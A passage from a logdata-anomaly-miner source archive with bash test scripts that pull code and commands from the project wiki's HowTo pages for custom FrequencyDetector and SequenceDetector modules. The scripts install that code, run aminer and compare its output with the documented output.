read new command (15.) awk '/^```$/ && ++n == 34, /^```$/ && n++ == 35' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } # extract logline and resulting outputs and compare them. (16.) awk '/^```$/ && ++n == 40, /^```$/ && n++ == 41' < $INPUT_FILE > $OUT OUT1=$(sed -n '6p' < $OUT) OUT1=$(echo "$OUT1" | sed "s/b'//g") OUT1=$(echo "$OUT1" | sed "s/'//g") echo "$OUT1" >> $LOG OUT1=$(sed -n '4,6p' < $OUT) runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,4p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 16." exit_code=$((exit_code | $?)) sudo rm -r logdata-anomaly-miner.wiki rm $OUT sudo rm $CFG_PATH exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runHowToCreateYourOwnFrequencyDetector.sh000077500000000000000000000257611437606560100312070ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Read the log lines between the 1st and 2nd ``` and save it to /tmp/access.log (LOG) # 2.) Read 1st ```python and 3rd ``` and write the FrequencyDetector to ../source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/FrequencyDetector.py # 3.) Check if the parameter definitions between 4th and 5th are the same as in ../source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py # (each line on its own) # 4.) Add the FrequencyDetector parameters between 6th and 7th are the same as in ../source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py # 5.) Add the code between 2nd ```python and 8th ``` to the ../source/root/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py # 6.) Write the config to CFG_PATH from 1st ```yaml to 9th ``` and replace LogResourceList to LOG. # 7.) Read CMD from the second line between the 1st ```bash to 10th ``` and run it with sudo. # 8.) Compare the outputs with the ones between 11th and 12th ```. # 9.) Read line between 3rd ```python and 13th ``` and add it between 23rd and 24th line in the CFG_PATH # 10.) Remove lines 36-38 in the $FREQ_DET and append the method between 4th ```python and 14th ``` + newline between. # 11.) Run CMD and check if the output is the same as the one between 15th and 16th ```. # 12.) Remove the previously added lines and add the lines between 5th ```python and 17th ```. # 13.) Run CMD and compare the output to the one between 18th and 19th ```. # 14.) Remove the previously added lines and add the lines between 6th ```python and 20th ```. # 15.) Run CMD and compare the output to the one between 21st and 22nd ```. # 16.) Remove the previously added lines and add the lines between 7th ```python and 23rd ```. # 17.) Run CMD and compare the output to the one between 1st ```json and 24th ```. # 18.) Replace the do_persist method with the lines between 8th ```python and 25th ``` and run CMD. # 19.) Run CMD in 2nd ```bash and 26th ``` and compare it to the output in the second line. # 20.) Add lines between 9th ```python and 27th ```. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi sudo chown -R aminer:aminer /var/lib/aminer 2> /dev/null INPUT=logdata-anomaly-miner.wiki/HowTo-Create-your-own-FrequencyDetector.md VAL_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py TMP_VAL_SCHEMA=/tmp/AnalysisValidationSchema.py NOR_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py OUT=/tmp/out.txt SRC_FILE=logdata-anomaly-miner.wiki/HowTo-Create-your-own-FrequencyDetector.md VAL_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py TMP_VAL_SCHEMA=/tmp/AnalysisValidationSchema.py YML_CONFIG=/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py TMP_YML_CONFIG=/tmp/YamlConfig.py TMP_SCHEMA=/tmp/schema.py FREQ_DET=/usr/lib/logdata-anomaly-miner/aminer/analysis/FrequencyDetector.py TMP_FREQ_DET=/tmp/FrequencyDetector.py CFG_PATH=/etc/aminer/config.yml LOG=/tmp/access.log # extract the file from the development branch of the wiki project. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. cp /home/user/Documents/HowTo-Create-your-own-FrequencyDetector.md logdata-anomaly-miner.wiki/ # create log file (1.) awk '/^```$/ && ++n == 1, /^```$/ && n++ == 2' < $INPUT | sed '/^```/ d' > $LOG # 2.) create FrequencyDetector awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 3.) compare parameter definitions with AnalysisNormalisationSchema awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT > $OUT LINE=$(sed -n '2p' < $OUT) if ! fgrep -q "$LINE" $NOR_SCHEMA; then echo "$LINE not found in $NOR_SCHEMA" echo "Failed Test in 3." echo exit_code=1 fi LINE=$(sed -n '3p' < $OUT) if ! fgrep -q "$LINE" $NOR_SCHEMA; then echo "$LINE not found in $NOR_SCHEMA" echo "Failed Test in 3." echo exit_code=1 fi # 4.) Add the FrequencyDetector parameters to the AnalysisValidationSchema sudo cp $VAL_SCHEMA $TMP_VAL_SCHEMA awk '/^{$/,/^ }$/' $VAL_SCHEMA > $TMP_SCHEMA echo , >> $TMP_SCHEMA awk '/^```$/ && ++n == 6, /^```$/ && n++ == 7' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA awk '/^ ]$/,/^}$/' $VAL_SCHEMA >> $TMP_SCHEMA sudo cp $TMP_SCHEMA $VAL_SCHEMA # 5.) Add code to the YamlConfig.py # create backup of YamlConfig.py cp $YML_CONFIG $TMP_YML_CONFIG # add code to YamlConfig.py printf " " > $TMP_SCHEMA awk '/^```python$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA sudo sed -i " /anomaly_threshold=item/r $TMP_SCHEMA" $YML_CONFIG # 6.) Write the config to CFG_PATH and replace LogResourceList to LOG. awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null sudo sed -i 's?file:///home/ubuntu/apache.log?file:///tmp/access.log?g' $CFG_PATH # 7.) Read CMD from the second line between the 1st ```bash to 10th ``` and run it with sudo. awk '/^```bash$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '2p' < $OUT) CMD="sudo ${CMD#* } --config $CFG_PATH" runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$? # 8.) Compare the outputs with the ones between 11th and 12th ```. OUT1=$(tail -n 14 $OUT) awk '/^```$/ && ++n == 11, /^```$/ && n++ == 12' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 8." exit_code=$((exit_code | $?)) # 9.) Read line between 3rd ```python and 13th ``` and add it between 23rd and 24th line in the FREQ_DET awk '/^```python$/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` sed -i "23 i \ $IN1" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 10.) Remove lines 36-38 in the FREQ_DET and append the method between 4th ```python and 14th ``` + newline between. sed -i -e "35,38d" $TMP_FREQ_DET awk '/^```python$/ && ++n == 4, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 11.) Run CMD and check if the output is the same as the one between 15th and 16th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 18 $OUT) awk '/^```$/ && ++n == 15, /^```$/ && n++ == 16' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 11." exit_code=$((exit_code | $?)) # 12.) Remove the previously added lines and add the lines between 5th ```python and 17th ```. tac $TMP_FREQ_DET | sed '1,13d' | tac > $OUT cp $OUT $TMP_FREQ_DET awk '/^```python$/ && ++n == 5, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "$IN1" >> $TMP_FREQ_DET # 13.) Run CMD and compare the output to the one between 18th and 19th ```. sed -i "23 i \ self.counts = {}" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 14 $OUT) awk '/^```$/ && ++n == 18, /^```$/ && n++ == 19' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 13." exit_code=$((exit_code | $?)) # 14.) Remove the previously added lines and add the lines between 6th ```python and 20th ```. tail -n 6 $TMP_FREQ_DET > $OUT IN=`cat $OUT` tac $TMP_FREQ_DET | sed '1,14d' | tac > $OUT cp $OUT $TMP_FREQ_DET awk '/^```python$/ && ++n == 6, /^```$/' < $INPUT | sed '/^```/ d' | sed '1,2d;23d' > $OUT IN1=`cat $OUT` echo -e "$IN1" >> $TMP_FREQ_DET echo -e "$IN" >> $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 15.) Run CMD and compare the output to the one between 21st and 22nd ```. sed -i "23 i \ self.counts_prev = {}" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 17 $OUT) awk '/^```$/ && ++n == 21, /^```$/ && n++ == 22' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 15." exit_code=$((exit_code | $?)) # 16.) Remove the previously added lines and add the lines between 7th ```python and 23rd ```. tail -n 6 $TMP_FREQ_DET > $OUT IN=`cat $OUT` tac $TMP_FREQ_DET | sed '1,26d' | tac > $OUT cp $OUT $TMP_FREQ_DET awk '/^```python$/ && ++n == 7, /^```$/' < $INPUT | sed '/^```/ d' | sed '1,2d;38d' > $OUT IN1=`cat $OUT` echo -e "$IN1" >> $TMP_FREQ_DET echo -e "$IN" >> $TMP_FREQ_DET tac $TMP_FREQ_DET | sed '1d' | tac > $OUT # remove print cp $OUT $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET # 17.) Run CMD and compare the output to the one between 1st ```json and 24th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # delete detectionTimestamp from comparison tac $OUT | sed '32d' | tac > $TMP_SCHEMA cp $TMP_SCHEMA $OUT OUT1=$(tail -n 59 $OUT) awk '/^```json$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $OUT # delete detectionTimestamp from comparison sed -i -e "29d" $OUT IN1=`cat $OUT` compareStrings "$OUT1" "$IN1" "Failed Test in 17." exit_code=$((exit_code | $?)) # 18.) Replace the do_persist method with the lines between 8th ```python and 25th ``` and run CMD. sed -i -e "56,59d" $TMP_FREQ_DET awk '/^```python$/ && ++n == 8, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n $IN1" >> $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # 19.) Run CMD in 2nd ```bash and 26th ``` and compare it to the output in the second line. awk '/^```bash$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD1=$(sed -n '1p' < $OUT) CMD1="${CMD1#* }" $CMD1 > $OUT OUT1=`cat $OUT` awk '/^```bash$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(sed -n '2p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 19." exit_code=$((exit_code | $?)) # 20.) Add lines between 9th ```python and 27th ```. CMD="sudo aminer -f" awk '/^```python$/ && ++n == 9, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` sed -i "/ PersistenceUtil.add_persistable_component(self)/r $OUT" $TMP_FREQ_DET sudo cp $TMP_FREQ_DET $FREQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) sudo cp $TMP_VAL_SCHEMA $VAL_SCHEMA sudo cp $TMP_YML_CONFIG $YML_CONFIG sudo rm $TMP_VAL_SCHEMA sudo rm $CFG_PATH sudo rm $TMP_YML_CONFIG sudo rm $TMP_FREQ_DET sudo rm $FREQ_DET sudo rm $OUT sudo rm $TMP_SCHEMA sudo rm -r logdata-anomaly-miner.wiki exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runHowToCreateYourOwnSequenceDetector.sh000077500000000000000000000402131437606560100310030ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Read the log lines between the 2nd and 3rd ``` and save it to /tmp/access.log (LOG) # 2.) Read 2nd ```bash and 3rd ```, extract CMD from the first line after # , run CMD and compare the output with the 2nd to 4th line of the previous output. # 3.) Read commands between 3rd ```bash and 5th ```, get the CMD after # and check if aminer_install.sh exists and is executable. # 4.) Read the CMD between 4th ```bash and 6th ``` and get the CMD after # . # 5.) Replace the path in the second string with the current directory and run the CMD. # 6.) Read the CMD between 5th ```bash and 7th ```, get the CMD after # and run it. # 7.) Read the CMD between 6th ```bash and 8th ```, get the CMD after # and run it. # 8.) Read between 1st ```yaml and 9th ``` and store it in CFG_PATH. # 9.) Read CFG_PATH, replace the line with json: True and compare it with the 1st ```yaml in Getting-started-(tutorial).md. # 10.) Read 7th ```bash and 10th ```. Extract CMD in first line and run it as sudo. # 11.) Compare the outputs (replace lines with timestamps and dates). # 12.) Read 1st ```python and 12th ``` and write it to SEQ_DET. # 13.) Read 2nd ```yaml and 13th ``` and write it at 18th line in CFG_PATH. # 14.) Check if line between 15th and 16th ``` can be found in /usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py # 15.) Add code between 18th and 19th ``` to /usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py # 16.) Add 2nd ```python and 21st ``` to the YML_CONFIG. # 17.) Run aminer CMD and check if the output contains "Detector template received a log atom!" times the number of log lines. # 18.) Read 3rd ```python and 24th ``` and replace the receive_atom method in the SEQ_DET. # 19.) Run aminer CMD and check if the output contains data between 25th and 26th ```. # 20.) Read 4th ```python and 27th ``` and replace the receive_atom method in the SEQ_DET. # 21.) Run aminer CMD and check if the output is the same as between 28th and 29th ```. # 22.) Read 5th ```python and 30th ``` and replace the receive_atom method in the SEQ_DET. # 23.) Replace Analysis in CFG_PATH with the config between 3rd ```yaml and 31st ```. # 24.) Run aminer CMD and check if the output is the same as between 32nd and 33th ```. # 25.) Add code between 34th and 35th ``` in the __init__ method. # 26.) Read 6th ```python and 36th ``` and replace the receive_atom method in the SEQ_DET. # 27.) Run aminer CMD and check if the output is the same as between 37th and 38th ```. # 28.) Read 7th ```python and 39th ``` and replace the receive_atom method in the SEQ_DET. # 29.) Add lines between 14th ```bash and 42nd ``` to the LOG. # 30.) Run aminer CMD and check if the output is the same as between 40th and 41st ``` plus the text between 43th and 44th ```. # 31.) Read 8th ```python and 45th ``` and replace the receive_atom method in the SEQ_DET. # 32.) Compare the output with the json between 1st ```json and 46th ```. # 33.) Replace the do_persist method with the code between 9th ```python and 47th ```. # 34.) Run the CMD in the first line between 15th ```bash and 48th ``` and compare the output with the second line. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi sudo chown -R aminer:aminer /var/lib/aminer 2> /dev/null INPUT=logdata-anomaly-miner.wiki/HowTo-Create-your-own-SequenceDetector.md SRC_FILE=logdata-anomaly-miner.wiki/HowTo-Create-your-own-SequenceDetector.md VAL_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py TMP_VAL_SCHEMA=/tmp/AnalysisValidationSchema.py NOR_SCHEMA=/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py OUT=/tmp/out.txt YML_CONFIG=/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py TMP_YML_CONFIG=/tmp/YamlConfig.py TMP_SCHEMA=/tmp/schema.py SEQ_DET=/usr/lib/logdata-anomaly-miner/aminer/analysis/SequenceDetector.py TMP_SEQ_DET=/tmp/SequenceDetector.py CFG_PATH=/etc/aminer/config.yml LOG=/tmp/access.log # extract the file from the development branch of the wiki project. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. # create log file (1.) awk '/^```$/ && ++n == 2, /^```$/ && n++ == 3' < $INPUT | sed '/^```/ d' > $LOG # extract version command and compare output. (2.) #awk '/^```bash$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT #CMD=$(sed -n '1p' < $OUT) #CMD="sudo ${CMD#* }" #OUT1=$(sed -n '2,4p' < $OUT) #$CMD > $OUT & #PID=$! #sleep 5 #sudo pkill -x aminer #wait $PID #OUT2=`cat $OUT` #compareStrings "$OUT1" "$OUT2" "Failed Test in 2." #exit_code=$? # 3.) Read commands between 3rd ```bash and 5th ```, get the CMD after # and check if aminer_install.sh exists and is executable. FILE="aminer_install.sh" awk '/^```bash$/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="${CMD#* } -q" $CMD if [ ! -f "$FILE" ]; then echo "$FILE does not exist." exit_code=1 fi CMD=$(sed -n '2p' < $OUT) CMD="${CMD#* }" $CMD if [ ! -x "$FILE" ]; then echo "$FILE is not executable." exit_code=1 fi # 4.) Read the CMD between 4th ```bash and 6th ``` and get the CMD after # . (skipping this step) #awk '/^```bash$/ && ++n == 4, /^```$/' < $INPUT | sed '/^```/ d' > $OUT #CMD=$(sed -n '1p' < $OUT) #CMD="${CMD#* }" # 5.) Replace the path in the second string with the current directory and run the CMD. (skipping this step) #PWD=$(pwd) #CMD=$(echo "${CMD?/home/ubuntu/aminer?"$PWD"}" ) #$CMD # 6.) Read the CMD between 5th ```bash and 7th ```, get the CMD after # and run it. (skipping this step) #awk '/^```bash$/ && ++n == 5, /^```$/' < $INPUT | sed '/^```/ d' > $OUT #CMD=$(sed -n '1p' < $OUT) #CMD="${CMD#* }" #$CMD # 7.) Read the CMD between 6th ```bash and 8th ```, get the CMD after # and run it. awk '/^```bash$/ && ++n == 6, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="${CMD#* }" $CMD 2> /dev/null # 8.) Read between 1st ```yaml and 9th ``` and store it in CFG_PATH. awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # 9.) Read CFG_PATH, replace the line with json: True and compare it with the 1st ```yaml in Getting-started-(tutorial).md. OUT1=$(sudo cat $CFG_PATH | sed -n '1,21p') CMD=$(sudo cat $CFG_PATH | sed -n '23p') OUT1="$OUT1 $CMD" awk '/^```yaml$/ && ++n == 1, /^```$/' < logdata-anomaly-miner.wiki/Getting-started-\(tutorial\).md | sed '/^```/ d' > $OUT sudo sed -i 's?file:///var/log/apache2/access.log?file:///home/ubuntu/access.log?g' $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 9." exit_code=$((exit_code | $?)) sudo sed -i 's?file:///home/ubuntu/access.log?file:///tmp/access.log?g' $CFG_PATH # 10.) Read 7th ```bash and 10th ```. Extract CMD in first line and run it as sudo. awk '/^```bash$/ && ++n == 7, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="sudo ${CMD#* }" runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # 11.) Compare the outputs (replace lines with timestamps and dates). OUT1=$(sed -n '2,44p' < $OUT) OUT2=$(sed -n '46,98p' < $OUT) OUT1="$OUT1 $OUT2" OUT2=$(sed -n '100,131p' < $OUT) OUT1="$OUT1 $OUT2" OUT2=$(sed -n '2,44p' < $OUT) OUT3=$(sed -n '46,98p' < $OUT) OUT2="$OUT2 $OUT3" OUT3=$(sed -n '100,131p' < $OUT) OUT2="$OUT2 $OUT3" compareStrings "$OUT1" "$OUT2" "Failed Test in 11." exit_code=$((exit_code | $?)) # 12.) Read 1st ```python and 12th ``` and write it to SEQ_DET. awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 13.) Read 2nd ```yaml and 13th ``` and write it at 18th line in CFG_PATH. awk '/^```yaml/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 4 < $OUT) OUT1=$(head -n 17 < $CFG_PATH) OUT2=$(tail -n 5 < $CFG_PATH) echo "$OUT1 $IN1 $OUT2" | sudo tee $CFG_PATH > /dev/null # 14.) Check if line between 15th and 16th ``` can be found in /usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/AnalysisNormalisationSchema.py awk '/^```$/ && ++n == 15, /^```$/ && n++ == 16' < $INPUT > $OUT LINE=$(sed -n '2p' < $OUT) if ! fgrep -q "$LINE" $NOR_SCHEMA; then echo "$LINE not found in $NOR_SCHEMA" echo "Failed Test in 14." echo exit_code=1 fi # 15.) Add code between 18th and 19th ``` to /usr/lib/logdata-anomaly-miner/aminer/schemas/validation/AnalysisValidationSchema.py sudo cp $VAL_SCHEMA $TMP_VAL_SCHEMA awk '/^{$/,/^ }$/' $VAL_SCHEMA > $TMP_SCHEMA echo , >> $TMP_SCHEMA awk '/^```$/ && ++n == 18, /^```$/ && n++ == 19' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA awk '/^ ]$/,/^}$/' $VAL_SCHEMA >> $TMP_SCHEMA sudo cp $TMP_SCHEMA $VAL_SCHEMA # 16.) Add 2nd ```python and 21st ``` to the YML_CONFIG. # create backup of YamlConfig.py cp $YML_CONFIG $TMP_YML_CONFIG # add code to YamlConfig.py printf " " > $TMP_SCHEMA awk '/^```python$/ && ++n == 2, /^```$/' < $INPUT | sed '/^```/ d' >> $TMP_SCHEMA sudo sed -i " /anomaly_threshold=item/r $TMP_SCHEMA" $YML_CONFIG # 17.) Run aminer CMD and check if the output contains "Detector template received a log atom!" times the number of log lines. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) CNT=$(grep -o "Detector template received a log atom!" $OUT | wc -l) if [ $CNT != 8 ]; then echo "Failed Test in 17. $CNT != 8" echo exit_code=1 fi # 18.) Read 3rd ```python and 24th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "34,36d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 19.) Run aminer CMD and check if the output contains data between 25th and 26th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 27 < $OUT) awk '/^```$/ && ++n == 25, /^```$/ && n++ == 26' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 19." exit_code=$((exit_code | $?)) # 20.) Read 4th ```python and 27th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "61,65d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 4, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 21.) Run aminer CMD and check if the output is the same as between 28th and 29th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 8 < $OUT) awk '/^```$/ && ++n == 28, /^```$/ && n++ == 29' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 21." exit_code=$((exit_code | $?)) # 22.) Read 5th ```python and 30th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "61,65d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 5, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 23.) Replace Analysis in CFG_PATH with the config between 3rd ```yaml and 31st ```. OUT1=$(head -n 18 $CFG_PATH) awk '/^```yaml/ && ++n == 3, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 4 $OUT) OUT2=$(tail -n 5 $CFG_PATH) echo "$OUT1 $IN1 $OUT2" | sudo tee $CFG_PATH > /dev/null # 24.) Run aminer CMD and check if the output is the same as between 32nd and 33th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 8 < $OUT) awk '/^```$/ && ++n == 32, /^```$/ && n++ == 33' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 24." exit_code=$((exit_code | $?)) # 25.) Add code between 34th and 35th ``` in the __init__ method. awk '/^```$/ && ++n == 34, /^```$/ && n++ == 35' < $INPUT | sed '/^```/ d' > $OUT IN1=$(head -n 1 $OUT) sed -i "30 i \ $IN1" $TMP_SEQ_DET IN1=$(tail -n 1 $OUT) sed -i "31 i \ $IN1" $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 26.) Read 6th ```python and 36th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "82d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 6, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 7 $OUT) echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 27.) Run aminer CMD and check if the output is the same as between 37th and 38th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 6 < $OUT) awk '/^```$/ && ++n == 37, /^```$/ && n++ == 38' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` compareStrings "$OUT1" "$OUT2" "Failed Test in 27." exit_code=$((exit_code | $?)) # 28.) Read 7th ```python and 39th ``` and replace the receive_atom method in the SEQ_DET. awk '/^```python$/ && ++n == 7, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=$(tail -n 4 $OUT) echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 29.) Add lines between 14th ```bash and 42nd ``` to the LOG. echo "192.168.10.190 - - [29/Feb/2020:14:10:35 +0000] \"GET /services/portal/ HTTP/1.1\" 200 4345 \"-\" \"-\"" >> $LOG echo "192.168.10.190 - - [29/Feb/2020:14:10:45 +0000] \"GET /kronolith/ HTTP/1.1\" 200 3452 \"-\" \"-\"" >> $LOG echo "192.168.10.190 - - [29/Feb/2020:14:10:54 +0000] \"GET /nag/ HTTP/1.1\" 200 25623 \"-\" \"-\"" >> $LOG # 30.) Run aminer CMD and check if the output is the same as between 40th and 41st ``` plus the text between 43th and 44th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 15 < $OUT) awk '/^```$/ && ++n == 40, /^```$/ && n++ == 41' < $INPUT | sed '/^```/ d' > $OUT OUT2=`cat $OUT` awk '/^```$/ && ++n == 43, /^```$/ && n++ == 44' < $INPUT | sed '/^```/ d' > $OUT OUT3=`cat $OUT` OUT2="$OUT2 $OUT3" compareStrings "$OUT1" "$OUT2" "Failed Test in 30." exit_code=$((exit_code | $?)) # 31.) Read 8th ```python and 45th ``` and replace the receive_atom method in the SEQ_DET. sed -i -e "89,94d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 8, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET # 32.) Compare the output with the json between 1st ```json and 46th ```. runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) OUT1=$(tail -n 40 $OUT) echo "$OUT1" > 